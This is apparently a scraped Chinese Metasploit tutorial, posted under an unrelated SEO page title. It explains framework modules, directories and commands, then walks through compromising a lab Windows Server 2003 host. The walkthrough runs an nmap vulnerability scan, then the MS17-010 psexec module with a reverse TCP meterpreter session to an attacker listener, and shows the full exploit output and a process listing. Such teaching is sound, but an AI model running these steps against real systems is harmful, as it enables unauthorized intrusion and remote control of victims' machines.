当前位置：首页 > news >正文

乐器网站模板网站快速排名优化

news 2025/11/14 15:37:25

乐器网站模板,网站快速排名优化,网络建站网网络推广,discuz做网站Metasploit框架(1), 简介, 主要模块, 目录, 基本命令, 入侵案例 Metasploit是一款开源的安全漏洞检测工具#xff0c;可以帮助安全和IT专业人士识别安全性问题#xff0c;验证漏洞的缓解措施#xff0c;并管理专家驱动的安全性进行评估#xff0c;提供真正的安全风险情…Metasploit框架(1), 简介, 主要模块, 目录, 基本命令, 入侵案例 Metasploit是一款开源的安全漏洞检测工具可以帮助安全和IT专业人士识别安全性问题验证漏洞的缓解措施并管理专家驱动的安全性进行评估提供真正的安全风险情报。这些功能包括智能开发代码审计 Web应用程序扫描社会工程。一, 主要模块辅助模块Aux) 渗透攻击模块Exploits) 后渗透攻击模块Post) 攻击载荷模块payloads) 编码器模块Encoders) 空指令模块Nops)二, 目录构成主目录: /usr/share/metasploit-framework config #metasploit的环境配置信息数据库配置信息 data #后渗透模块的一些工具及payload第三方小工具集合用户字典等数据信息 db #rails编译生成msf的web框架时的数据库信息 documentation #用户说明文档及开发文档 externa1 #metasploit的一些基础扩展模块 lib #metasploit的一些基础类和第三方模块类 log #msf运行时的一些系统信息和其他信息 modules #metasploit的系统工具模块,包括辅助模块(auxiliary)渗模块(exploits),攻击荷载(payloads)和后渗透模块(posts)以及空字段模块(nops)和编码模块(Encoders) msfbinscan #对bin文件进行文件偏移地址扫描 msfcli #metasploit命令行模式可以快速调用有效的payload进行攻击新版本的metasploit即将在2015年6月18日弃用 msfconsole #metasploit的基本命令行集成了各种功能。 msfd #metasploit服务非持久性服务 msfelfscan #对1inux的elf文件偏移地址进行扫描 msfencode #metasploit的编码模块可以对mepayload和she11code进行编码输出 msfpayload #metasploit攻击荷载用以调用不同的攻击荷载生成和输出不同格式的she11ocode,新版本用msfvenmon替代。 msfmachscan #同msfelfscan msfpescan #对windows的pe格式文件偏移地址进行扫描 msfrop #对windows的pe进行文件地址偏移操作可以绕过alsr等 msfrpc #metasploit的服务端非持久性的rpc服务 msfrpcd #持久性的metasploit本地服务可以给远程用户提供rpc服务以及其他的http服务可以通过xm1进行数据传输。 msfupdate #metasploit更新模块可以用来更新metasploit模块 msfvenom #集成了msfpaylad和msfencode的功能效率更高即将替代msf payload和msfencode p]ugins #metasploit的第三方插件接口 scripts #metasplit的常用后渗透模区别于data里的后渗透模块不需要加post参数和绝对路径可以直接运行 test #metasploit的基本测试目录 too1s #额外的小工具和第三方脚本工具三, 基本命令常用命令 msfconsole #启动MSF console, 进入msf控制台 search #搜索模块 info #查看当前模块的详细信息 use #使用模块 show options #显示模块的参数show mssing可以查看当前有哪些的配置没有设置 set/unset #设置变量/取消变量设置 run/exploit #运行漏洞模块 back #从模块上下文退回到msfconsole初始目录其他命令 msfupdate #msf版本更新目前使用apt update进行更新 help/? #打印当下窗口的帮助文档 help command/command --help #印command命令的帮助文栏 connect #可以看成是msfconsole界面下的nc工具 edit #编辑模块的ruby文件与用vim编辑相同 show advanced #不常用的高级选项不会在~show options~中显示 setg/unsetg #设器全局变量/取消全局变量设置只会设胃当前msf运行环境中的变量退出msf后设置就复位 save #将设置保存到/root/.msf4/configmsf启动时会读取该文件这样重新启动msf后设置依然保留 sessions #可以看见当前已经建立的攻击连接利用~sessions -i id命令进入指定连接 jobs#查看后台运行的模块 load/unload #连接插件如load openvas然后会出现相应的openvas命今使用时需要用openvas_connect连接外部扫描器 loadpath #调用自己编写的功能模块 route #向session指定路由 resource #调用rc文件的命令并执行以方便直接取得sessionsearchsploit命令: 在系统shell下执行, 用于直接搜索exploits. 搜索 thinkphp 相关的模块: searchsploit thinkphp--------------------------------------------------------------------- ---------------------------------Exploit Title | Path --------------------------------------------------------------------- --------------------------------- ThinkPHP - Multiple PHP Injection RCEs (Metasploit) | linux/remote/48333.rb ThinkPHP 2.0 - index.php Cross-Site Scripting | php/webapps/33933.txt ThinkPHP 5.0.23/5.1.31 - Remote Code Execution | php/webapps/45978.txt ThinkPHP 5.X - Remote Command Execution | php/webapps/46150.txt --------------------------------------------------------------------- --------------------------------- Shellcodes: No Results 查询exploits文件详情: searchsploit -p 48333 Exploit: ThinkPHP - Multiple PHP Injection RCEs (Metasploit)URL: https://www.exploit-db.com/exploits/48333Path: /usr/share/exploitdb/exploits/linux/remote/48333.rbCodes: CVE-2019-9082, CVE-2018-20062Verified: True File Type: Ruby script, ASCII text四, MSFDB数据库操作 MSF默认使用Kali内置的PostgreSQL数据库也可以修改为MySQL。 1. PostgreSQL命令 systemctl status postgresql 查看数据库服务状态 sudo -u postgres psql postgres 进入PSQL数据库命令行 \l 查看数据库列表 \c msf 切换到 msf 数据库 \d 查看当前数据库的所有表 \d users 查看users表的列 \q 退出 SQL语句: 一般sql语句 2. 数据库管理命令需要在系统shell下执行。 msfdb init 初始化数据库 msfdb reinit 重新初始化 msfdb delete 删除数据库 msfdb start 启动数据库 msfdb stop 停止数据库 msfdb status 查看数据库状态 3. msf数据库操作命令需要在msf控制台执行。 db_connect # db_connect msf:admin127.0.0.1:3306/msf 连接数据库, 前一个msf:用户名admin: 密码后一个msf:数据库名称 db_disconnect db_status #查看数据库状态有无连接 db_nmap #后续可以用hosts命令来查询扫描出的主机, db_nmap -O 192.168.112.200 db_rebui1d_cache#建立模块文件的缓存使search搜索速度更快 db_remove db_export #导出备份信息 db_import #导入备份信息备份为xm1文件五, 入侵案例本案例以入侵 windows server 2003 为例. 目标主机: 192.168.112.205 1. 进入msf msfconsole2. nmap 搜集信息这里是直接在msf内使用nmap, 所以命令是db_nmap, 而不是nmap. 扫描系统信息: db_nmap -O 192.168.112.205Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-27 23:05 EST Nmap scan report for 192.168.112.205 (192.168.112.205) Host is up (0.0011s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 00:0C:29:AF:2B:D0 (VMware) Device type: general purpose Running: Microsoft Windows 2003 OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 OS details: Microsoft Windows Server 2003 SP1 or SP2 Network Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.85 seconds扫描漏洞信息 db_nmap --scriptvuln 192.168.112.205[*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-27 23:06 EST [*] Nmap: Nmap scan report for 192.168.112.205 (192.168.112.205) [*] Nmap: Host is up (0.0030s latency). [*] Nmap: Not shown: 996 closed tcp ports (reset) [*] Nmap: PORT STATE SERVICE [*] Nmap: 135/tcp open msrpc [*] Nmap: 139/tcp open netbios-ssn [*] Nmap: 445/tcp open microsoft-ds [*] Nmap: 1025/tcp open NFS-or-IIS [*] Nmap: MAC Address: 00:0C:29:AF:2B:D0 (VMware) [*] Nmap: Host script results: [*] Nmap: |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND [*] Nmap: |_smb-vuln-ms10-054: false [*] Nmap: | smb-vuln-ms08-067: [*] Nmap: | VULNERABLE: [*] Nmap: | Microsoft Windows system vulnerable to remote code execution (MS08-067) [*] Nmap: | State: VULNERABLE [*] Nmap: | IDs: CVE:CVE-2008-4250 [*] Nmap: | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, [*] Nmap: | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary [*] Nmap: | code via a crafted RPC request that triggers the overflow during path canonicalization. [*] Nmap: | [*] Nmap: | Disclosure date: 2008-10-23 [*] Nmap: | References: [*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2008-4250 [*] Nmap: |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx [*] Nmap: | smb-vuln-ms17-010: [*] Nmap: | VULNERABLE: [*] Nmap: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) [*] Nmap: | State: VULNERABLE [*] Nmap: | IDs: CVE:CVE-2017-0143 [*] Nmap: | Risk factor: HIGH [*] Nmap: | A critical remote code execution vulnerability exists in Microsoft SMBv1 [*] Nmap: | servers (ms17-010). [*] Nmap: | [*] Nmap: | Disclosure date: 2017-03-14 [*] Nmap: | References: [*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2017-0143 [*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx [*] Nmap: |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds 这里可以看到 smb-vuln-ms08-067, smb-vuln-ms17-010 漏洞可能利用. 3. 搜索漏洞模块我们以 smb-vuln-ms17-010 为例搜索: search ms17-010atching Modules # Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Cde Execution2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Cmmand Execution3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce这里一共列出了5个相关的模块. 4. 进入漏洞模块我们以1号模块ms17_010_psexec为例, 根据编号使用它: use 1[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_psexec) 这里看到Shell 提示符变成了exploit(windows/smb/ms17_010_psexec) 说明进入模块. 5. 配置模块参数 show optionsModule options (exploit/windows/smb/ms17_010_psexec):Name Current Setting Required Description---- --------------- -------- -----------DBGTRACE false yes Show extra debug trace infoLEAKATTEMPTS 99 yes How many times to try to leak transactionNAMEDPIPE no A named pipe that can be connected to (leave blank for auto)NAMED_PIPES /usr/share/metasploit-framework/data/word yes List of named pipes to checklists/named_pipes.txtRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The Target port (TCP)SERVICE_DESCRIPTION no Service description to be used on target for pretty listingSERVICE_DISPLAY_NAME no The service display nameSERVICE_NAME no The service nameSHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder shareSMBDomain . no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser no The username to authenticate asPayload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: , seh, thread, process, none)LHOST 192.168.112.201 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 AutomaticView the full module info with the info, or info -d command. 这里rhost参数表示目标ip, 它是必选的, 所以设置它: set rhost 192.168.112.205rhost 192.168.112.205设置完参数可以重新使用 show options 重新检查一下. 6. 执行漏洞模块 run[*] Started reverse TCP handler on 192.168.112.201:4444 [*] 192.168.112.205:445 - Target OS: Windows Server 2003 R2 3790 Service Pack 2 [*] 192.168.112.205:445 - Filling barrel with fish... done [*] 192.168.112.205:445 - ---------------- | Entering Danger Zone | ---------------- [*] 192.168.112.205:445 - [*] Preparing dynamite... [*] 192.168.112.205:445 - Trying stick 1 (x64)...Miss [*] 192.168.112.205:445 - [*] Trying stick 2 (x86)...Boom! [*] 192.168.112.205:445 - [] Successfully Leaked Transaction! [*] 192.168.112.205:445 - [] Successfully caught Fish-in-a-barrel [*] 192.168.112.205:445 - ---------------- | Leaving Danger Zone | ---------------- [*] 192.168.112.205:445 - Reading from CONNECTION struct at: 0x87b59880 [*] 192.168.112.205:445 - Built a write-what-where primitive... [] 192.168.112.205:445 - Overwrite complete... SYSTEM session obtained! [*] 192.168.112.205:445 - Selecting native target [*] 192.168.112.205:445 - Uploading payload... PqTGuwAK.exe [*] 192.168.112.205:445 - Created \PqTGuwAK.exe... [] 192.168.112.205:445 - Service started successfully... [*] 192.168.112.205:445 - Deleting \PqTGuwAK.exe... [*] Sending stage (175686 bytes) to 192.168.112.205 [*] Meterpreter session 1 opened (192.168.112.201:4444 - 192.168.112.205:1028) at 2023-11-27 23:26:32 -0500meterpreter 这里看到Shell提示符变成了 meterpreter 说明已经入侵并连接了目标系统, 可以执行各种系统命令了.比如ps命令显示目标系统的进程: meterpreter psProcess List PID PPID Name Arch Session User Path--- ---- ---- ---- ------- ---- ----0 0 [System Process]4 0 System x86 0 NT AUTHORITY\SYSTEM172 2016 vmtoolsd.exe x86 0 ROOT-97473D4E73\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe264 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe312 264 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe336 264 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe384 336 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe396 336 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe432 596 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe576 384 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe596 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe660 2016 ctfmon.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\ctfmon.exe676 384 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe736 384 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe764 384 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe780 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe976 384 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe1004 384 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe1080 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe1120 384 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe1208 384 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe1276 384 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe1404 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe1436 2028 rundll32.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\rundll32.exe1540 384 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe1660 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe2016 1992 explorer.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\Explorer.EXE2628 2016 cmd.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\cmd.exe2644 2628 conime.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\conime.exe2716 780 wuauclt.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\wuauclt.exe7. 退出连接 exit[*] Shutting down Meterpreter...[*] 192.168.112.205 - Meterpreter session 1 closed. Reason: User exit msf6 exploit(windows/smb/ms17_010_psexec) 看到命令提示符回到了exploit(windows/smb/ms17_010_psexec) . 8. 退出模块 backmsf6 看到命令提示符回到了msf6 . 已经退出模块.

查看全文

http://www.zqtcl.cn/news/884286/